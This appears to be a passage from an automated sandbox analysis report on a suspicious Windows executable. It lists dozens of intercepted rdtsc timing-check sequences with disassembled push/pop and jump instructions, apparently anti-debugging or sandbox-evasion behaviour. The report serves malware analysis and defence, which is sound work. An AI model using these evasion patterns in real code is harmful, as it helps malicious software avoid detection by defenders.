Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 6C0AB1 second address: 69B11D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3B34C1F675h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c mov edi, dword ptr [ebp+122D36DAh] 0x00000012 sub dword ptr [ebp+122D309Bh], eax 0x00000018 call dword ptr [ebp+122D36F2h] 0x0000001e push ecx 0x0000001f jmp 00007F3B34C1F675h 0x00000024 jnc 00007F3B34C1F67Dh 0x0000002a jmp 00007F3B34C1F671h 0x0000002f push eax 0x00000030 push edx 0x00000031 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 69B11D second address: 69B136 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 jl 00007F3B34E245F8h 0x0000000d push ebx 0x0000000e jng 00007F3B34E245F6h 0x00000014 pushad 0x00000015 popad 0x00000016 pop ebx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 6C0F5E second address: 6C0F65 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 6C0FF9 second address: 6C0FFF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 6C115B second address: 6C1192 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, esi 0x00000009 sbb dl, 0000002Ah 0x0000000c nop 0x0000000d pushad 0x0000000e jmp 00007F3B34C1F675h 0x00000013 jne 00007F3B34C1F668h 0x00000019 popad 0x0000001a push eax 0x0000001b push eax 0x0000001c push edx 0x0000001d jng 00007F3B34C1F668h 0x00000023 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 6C1389 second address: 6C138D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 6C17DD second address: 6C1839 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edi 0x00000006 mov dword ptr [esp], eax 0x00000009 jbe 00007F3B34C1F66Bh 0x0000000f push 0000001Eh 0x00000011 push 00000000h 0x00000013 push ecx 0x00000014 call 00007F3B34C1F668h 0x00000019 pop ecx 0x0000001a mov dword ptr [esp+04h], ecx 0x0000001e add dword ptr [esp+04h], 0000001Ch 0x00000026 inc ecx 0x00000027 push ecx 0x00000028 ret 0x00000029 pop ecx 0x0000002a ret 0x0000002b sub dword ptr [ebp+122D2359h], edx 0x00000031 push eax 0x00000032 push eax 0x00000033 push edx 0x00000034 jmp 00007F3B34C1F679h 0x00000039 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 6C19BA second address: 6C19BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 6C1BA0 second address: 6C1BF4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3B34C1F675h 0x00000009 popad 0x0000000a mov dword ptr [esp], eax 0x0000000d je 00007F3B34C1F66Ch 0x00000013 lea eax, dword ptr [ebp+1248B85Ch] 0x00000019 push 00000000h 0x0000001b push esi 0x0000001c call 00007F3B34C1F668h 0x00000021 pop esi 0x00000022 mov dword ptr [esp+04h], esi 0x00000026 add dword ptr [esp+04h], 00000017h 0x0000002e inc esi 0x0000002f push esi 0x00000030 ret 0x00000031 pop esi 0x00000032 ret 0x00000033 nop 0x00000034 push ebx 0x00000035 push eax 0x00000036 push edx 0x00000037 push eax 0x00000038 push edx 0x00000039 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 6C1BF4 second address: 6C1BF8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 6C1BF8 second address: 6C1BFC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 6C1BFC second address: 6C1C38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 push eax 0x00000008 jne 00007F3B34E24608h 0x0000000e nop 0x0000000f add dx, 92B4h 0x00000014 lea eax, dword ptr [ebp+1248B818h] 0x0000001a or dword ptr [ebp+122D298Dh], eax 0x00000020 nop 0x00000021 push ebx 0x00000022 push eax 0x00000023 push edx 0x00000024 jnl 00007F3B34E245F6h 0x0000002a rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 6C1C38 second address: 6C1C48 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 push eax 0x00000008 pushad 0x00000009 push edi 0x0000000a pushad 0x0000000b popad 0x0000000c pop edi 0x0000000d push ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 6F0CDE second address: 6F0CE2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 6F0CE2 second address: 6F0CF5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3B34C1F66Dh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 6F13A3 second address: 6F13A8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 6F13A8 second address: 6F13BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F3B34C1F666h 0x0000000a jnl 00007F3B34C1F666h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 6F13BA second address: 6F13C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 6F13C5 second address: 6F13C9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 6F767A second address: 6F7680 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 6FD1AC second address: 6FD1B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 6FC0D3 second address: 6FC0D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 6FC0D8 second address: 6FC0E4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007F3B34C1F666h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 6FC0E4 second address: 6FC0E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 6FC0E8 second address: 6FC108 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3B34C1F674h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jg 00007F3B34C1F666h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 6FC108 second address: 6FC144 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F3B34E24606h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 jmp 00007F3B34E24605h 0x00000015 pop eax 0x00000016 pushad 0x00000017 pushad 0x00000018 popad 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 6FC144 second address: 6FC14A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 6FC14A second address: 6FC14F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 6FC2D5 second address: 6FC2D9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 6FC2D9 second address: 6FC2E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push edi 0x00000008 pop edi 0x00000009 pushad 0x0000000a popad 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 6FC2E7 second address: 6FC2F7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3B34C1F66Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 6FC6CD second address: 6FC709 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3B34E24609h 0x00000009 pop edx 0x0000000a push eax 0x0000000b push edx 0x0000000c jl 00007F3B34E245F8h 0x00000012 pushad 0x00000013 popad 0x00000014 pushad 0x00000015 pushad 0x00000016 popad 0x00000017 je 00007F3B34E245F6h 0x0000001d jmp 00007F3B34E245FAh 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 6FCB21 second address: 6FCB44 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3B34C1F671h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jg 00007F3B34C1F672h 0x0000000f ja 00007F3B34C1F666h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 6FCB44 second address: 6FCB4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push esi 0x00000007 pop esi 0x00000008 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 6FCB4C second address: 6FCB56 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F3B34C1F666h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 6FCCCC second address: 6FCCD0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 6FCCD0 second address: 6FCCD8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 702E96 second address: 702E9C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 7019FE second address: 701A1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F3B34C1F666h 0x0000000a push edi 0x0000000b pop edi 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f push edx 0x00000010 pop edx 0x00000011 jmp 00007F3B34C1F66Ch 0x00000016 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 701B59 second address: 701B65 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F3B34E245F6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 701B65 second address: 701B72 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jnl 00007F3B34C1F666h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 701B72 second address: 701B78 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 701B78 second address: 701B81 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ecx 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 702D04 second address: 702D2B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ebx 0x00000007 pop edi 0x00000008 push eax 0x00000009 push edx 0x0000000a push esi 0x0000000b push eax 0x0000000c pop eax 0x0000000d pop esi 0x0000000e jmp 00007F3B34E24609h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 701712 second address: 701717 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 701717 second address: 701727 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a jo 00007F3B34E245F6h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 701727 second address: 70172B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 70172B second address: 701731 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 705CBB second address: 705CE3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3B34C1F679h 0x00000007 jng 00007F3B34C1F666h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pop esi 0x00000010 pushad 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 705CE3 second address: 705D26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3B34E24600h 0x00000009 jmp 00007F3B34E24605h 0x0000000e push edi 0x0000000f pop edi 0x00000010 popad 0x00000011 pushad 0x00000012 jmp 00007F3B34E245FEh 0x00000017 pushad 0x00000018 popad 0x00000019 pushad 0x0000001a popad 0x0000001b popad 0x0000001c push edi 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 705E71 second address: 705E76 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 70614E second address: 706154 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 706154 second address: 70617D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3B34C1F66Ch 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jns 00007F3B34C1F66Ch 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 je 00007F3B34C1F668h 0x0000001a push edx 0x0000001b pop edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 708B2C second address: 708B5A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jp 00007F3B34E245F6h 0x00000009 ja 00007F3B34E245F6h 0x0000000f js 00007F3B34E245F6h 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 pushad 0x00000019 pushad 0x0000001a jmp 00007F3B34E24602h 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 70865A second address: 708684 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 push eax 0x00000008 jmp 00007F3B34C1F670h 0x0000000d pop eax 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 pushad 0x00000013 popad 0x00000014 push edi 0x00000015 pop edi 0x00000016 pushad 0x00000017 popad 0x00000018 popad 0x00000019 push eax 0x0000001a push edx 0x0000001b push ecx 0x0000001c pop ecx 0x0000001d push eax 0x0000001e pop eax 0x0000001f rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 708684 second address: 70868E instructions: 0x00000000 rdtsc 0x00000002 js 00007F3B34E245F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 70868E second address: 7086A7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3B34C1F675h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 70E2B8 second address: 70E2C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F3B34E245F6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 70E2C2 second address: 70E2D2 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F3B34C1F666h 0x00000008 jng 00007F3B34C1F666h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 70E2D2 second address: 70E2DC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007F3B34E245F6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 70E2DC second address: 70E2E0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 70E2E0 second address: 70E302 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push ecx 0x0000000b jmp 00007F3B34E24600h 0x00000010 pushad 0x00000011 popad 0x00000012 pop ecx 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 70E302 second address: 70E31D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3B34C1F677h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 70E5A7 second address: 70E5B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 jg 00007F3B34E24609h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 6C16A7 second address: 6C16B1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007F3B34C1F666h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 70EAD9 second address: 70EAF4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F3B34E245F6h 0x0000000a pop ecx 0x0000000b jl 00007F3B34E245F8h 0x00000011 push edx 0x00000012 pop edx 0x00000013 js 00007F3B34E245FCh 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 712BC8 second address: 712BCC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 712BCC second address: 712BEE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3B34E24606h 0x00000007 push eax 0x00000008 push edx 0x00000009 jo 00007F3B34E245F6h 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 712D96 second address: 712DA0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007F3B34C1F666h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 7131ED second address: 713200 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F3B34E245F6h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 push edi 0x00000011 pop edi 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 71792F second address: 71794F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3B34C1F670h 0x00000009 pop ebx 0x0000000a pushad 0x0000000b push edi 0x0000000c pop edi 0x0000000d jne 00007F3B34C1F666h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 71794F second address: 717975 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F3B34E24601h 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F3B34E245FCh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 717975 second address: 717979 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 717092 second address: 7170B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F3B34E24608h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 7170B1 second address: 7170B5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 7170B5 second address: 7170BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 7170BB second address: 7170D5 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 push ecx 0x00000006 pop ecx 0x00000007 pop ebx 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jnp 00007F3B34C1F684h 0x00000010 push eax 0x00000011 push edx 0x00000012 jne 00007F3B34C1F666h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 7170D5 second address: 7170D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 7170D9 second address: 7170E4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push eax 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 71726A second address: 71726E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 7173EA second address: 7173F0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 72010B second address: 720111 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 71E488 second address: 71E48C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 71E779 second address: 71E78F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3B34E24602h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 71F025 second address: 71F032 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
